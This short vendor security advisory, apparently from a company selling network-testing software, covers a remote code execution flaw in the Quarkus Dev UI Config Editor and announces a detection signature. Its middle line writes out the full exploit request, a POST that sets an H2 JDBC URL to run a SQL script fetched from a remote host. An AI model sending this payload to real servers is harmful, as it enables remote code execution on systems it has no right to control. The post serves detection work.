Quarkus was created to enable Java developers to create applications for a modern, cloud-native world.
Red Hat Quarkus could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Dev UI Config Editor.
By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.
POST /q/dev/io.quarkus.quarkus-vertx-http/config PAYLOAD - action=updateProperty&name=quarkus.datasource.jdbc.url&value=jdbc%3Ah2%3Amem%3Atestdb%3BINIT%3Drunscript+from+'http%3A%2F%2Fsomerandomsite.bla%3A8081%2Fexec.sql'
By turning this into a traffic file and matching rule, we are able to detect attempts to perform remote code execution on an affected system.
Idappcom have created signature 8023375 for this vulnerability.
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional